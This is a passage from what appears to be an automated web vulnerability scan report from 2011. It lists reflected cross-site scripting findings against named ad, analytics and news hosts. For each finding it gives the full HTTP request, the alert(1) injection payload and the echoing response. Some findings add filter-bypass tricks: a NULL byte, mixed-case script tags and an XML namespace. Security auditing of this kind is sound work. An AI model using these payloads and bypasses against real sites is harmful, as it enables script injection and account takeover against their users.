Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: LP=1315398861; expires=Sun, 11 Sep 2011 16:34:21 GMT; path=/; domain=.questionmarket.com
Content-Length: 2702
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
rame;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1fee25'-alert(1)-'65069f0c0a8&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOT
...[SNIP]...

1.42. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [protocol parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the protocol request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d00ae'%3balert(1)//5eba82bd623 was submitted in the protocol parameter. This input was echoed as d00ae';alert(1)//5eba82bd623 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=httpd00ae'%3balert(1)//5eba82bd623&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:23 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: LP=1315398863; expires=Sun, 11 Sep 2011 16:34:23 GMT; path=/; domain=.questionmarket.com
Content-Length: 2732
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
eight*1.01) {
doc_area = DL_width*DL_height;
biggestframe = df.frames[i];
}
}
df=biggestframe;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='httpd00ae';alert(1)//5eba82bd623://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=httpd00ae'%3balert(1)//5eba82bd623&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJ
...[SNIP]...

1.43. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %005cfe5'-alert(1)-'0089328db21 was submitted in the site parameter. This input was echoed as 5cfe5'-alert(1)-'0089328db21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9%005cfe5'-alert(1)-'0089328db21&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:17 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1315398857; expires=Sun, 11 Sep 2011 16:34:17 GMT; path=/; domain=.questionmarket.com
Content-Length: 2705
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
df=biggestframe;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9%005cfe5'-alert(1)-'0089328db21&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MD
...[SNIP]...

1.44. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8cde5<script>alert(1)</script>0db736188ef was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fstockoodles.com%2F%3Fa%3DMSN-SRB&callback=_ate.cbs.sc_httpstockoodlescomaMSNSRB28cde5<script>alert(1)</script>0db736188ef HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/?a=MSN-SRB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Wed, 07 Sep 2011 12:32:17 GMT
Content-Length: 94
Connection: close

_ate.cbs.sc_httpstockoodlescomaMSNSRB28cde5<script>alert(1)</script>0db736188ef({"shares":0});

1.45. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload a5dcf<script>alert(1)</script>661bf37752d was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDataa5dcf<script>alert(1)</script>661bf37752d&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 07 Sep 2011 12:21:02 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDataa5dcf<script>alert(1)</script>661bf37752d({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.46. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 326f0<script>alert(1)</script>dc7df702c62 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun326f0<script>alert(1)</script>dc7df702c62 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 07 Sep 2011 12:21:04 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun326f0<script>alert(1)</script>dc7df702c62)

1.47. http://api.dimestore.com/viapi [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ac888<a>8f8f392bd8e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=eb2039789ac888<a>8f8f392bd8e HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/RGA/iview/350415430/direct/01/6854533?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7b/3/0/%2a/b%3B245733871%3B0-0%3B0%3B46249204%3B3454-728/90%3B43845580/43863367/1%3B%3B%7Eokv%3D%3B%3Bpage%3DuberBannerAd%3Bmsrc%3DBOL_hpp_highlight_top%3B%3Bmc%3D0%3Btile%3D8%3Bsz%3D728x90%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 07 Sep 2011 12:29:33 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_eb2039789ac888<a>8f8f392bd8e=1; Expires=Thu, 06-Sep-2012 12:29:33 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- eb2039789ac888<a>8f8f392bd8e

1.48. http://api.dimestore.com/viapi [name parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 71e1a<a>9cf018d0a7 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=cookie&value=EyADRWJEY0FpdVF%252BSWQ%253D&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D71e1a<a>9cf018d0a7&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 07 Sep 2011 12:29:36 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: IgUsFjsrORc3NyILDBo6HychGw%3D%3D71e1a<a>9cf018d0a7=EyADRWJEY0FpdVF%2BSWQ%3D; Expires=Thu, 06-Sep-2012 12:29:36 GMT
Content-Length: 187

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IgUsFjsrORc3NyILDBo6HychGw%3D%3D71e1a<a>9cf018d0a7</name><value>EyADRWJEY0FpdVF%2BSWQ%3D</value></cookie></response>

1.49. http://api.dimestore.com/viapi [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the name request parameter is copied into the XML document as plain text between tags. The payload 17115<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>bf89301b6a1 was submitted in the name parameter. This input was echoed as 17115<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>bf89301b6a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /viapi?action=cookie&name=IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkN2fF4%253D17115<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>bf89301b6a1&mode=get HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 07 Sep 2011 12:29:35 GMT
Content-Type: text/xml
Connection: keep-alive
Content-Length: 244

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkN2fF4%3D17115<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>bf89301b6a1</name>
...[SNIP]...

1.50. http://api.dimestore.com/viapi [value parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the value request parameter is copied into the XML document as plain text between tags. The payload f1146<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ac628cc6951 was submitted in the value parameter. This input was echoed as f1146<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ac628cc6951 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /viapi?action=cookie&value=EyADRWJEY0FpdVF%252BSWQ%253Df1146<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ac628cc6951&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 07 Sep 2011 12:29:35 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: IgUsFjsrORc3NyILDBo6HychGw%3D%3D="EyADRWJEY0FpdVF%2BSWQ%3Df1146<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ac628cc6951"; Version=1; Max-Age=31536000
Content-Length: 258

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IgUsFjsrORc3NyILDBo6HychGw%3D%3D</name><value>EyADRWJEY0FpdVF%2BSWQ%3Df1146<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ac628cc6951</value>
...[SNIP]...

1.51. http://cc.wsj.net/cdssvco/file/v2/Files [absolutePath parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cc.wsj.net
Path:   /cdssvco/file/v2/Files

Issue detail

The value of the absolutePath request parameter is copied into the HTML document as plain text between tags. The payload 7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856 was submitted in the absolutePath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg31_201183.js7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg31_201183.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 07 Sep 2011 12:21:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 227453

dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne({"files":[{"absolutePath":"/djscript/bucket/NA_WSJ_PUB/page/0_0_WG_HeaderOne/provided/j_global_slim/version/vblg31_201183.js7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856","data":"dojo.provide(\"gravity.beacon\");\ndojo.require(\"dj.util.User\");\ndojo.require(\"dj.util.Cookie\");\n\ngravity.beacon = {\n\tinit: function() {\n\n\t\tdj.util.User.getUserId(function(_u){\n
...[SNIP]...

1.52. http://cc.wsj.net/cdssvco/file/v2/Files [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cc.wsj.net
Path:   /cdssvco/file/v2/Files

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg31_201183.js&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg31_201183.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 07 Sep 2011 12:21:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 227453

dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc({"files":[{"absolutePath":"/djscript/bucket/NA_WSJ_PUB/page/0_0_WG_HeaderOne/provided/j_global_slim/version/vblg31_201183.js","data":"dojo.provide(\"gravity.beacon\");\ndojo.require(\"dj.util.User\");
...[SNIP]...

1.53. http://dowjones.tt.omtrdc.net/m2/dowjones/mbox/ajax [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dowjones.tt.omtrdc.net
Path:   /m2/dowjones/mbox/ajax

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 19297<script>alert(1)</script>711c5156631 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/dowjones/mbox/ajax?mboxHost=online.wsj.com&mboxSession=1315416064836-197145&mboxPage=1315416073090-697223&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxCount=2&mbox=mboxCookieReader19297<script>alert(1)</script>711c5156631&mboxId=0&mboxTime=1315398071524&profile.subscriber=super%20user&mboxURL=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424053111904537404576555250572211010.html%3Fmod%3DWSJ_hp_LEFTTopStories&mboxReferrer=http%3A%2F%2Fonline.wsj.com%2Fhome-page&mboxVersion=40 HTTP/1.1
Host: dowjones.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904537404576555250572211010.html?mod=WSJ_hp_LEFTTopStories
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/JavaScript
Content-Length: 322
Date: Wed, 07 Sep 2011 12:21:51 GMT
Server: Test & Target

mboxFactories.get('default').get('mboxCookieReader19297<script>alert(1)</script>711c5156631',0).cancelTimeout();mboxFactories.get('default').get('mboxCookieReader19297<script>alert(1)</script>711c5156
...[SNIP]...

1.54. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b8b'%3b0e868ba3cf5 was submitted in the REST URL parameter 2. This input was echoed as 44b8b';0e868ba3cf5 in the application's response.

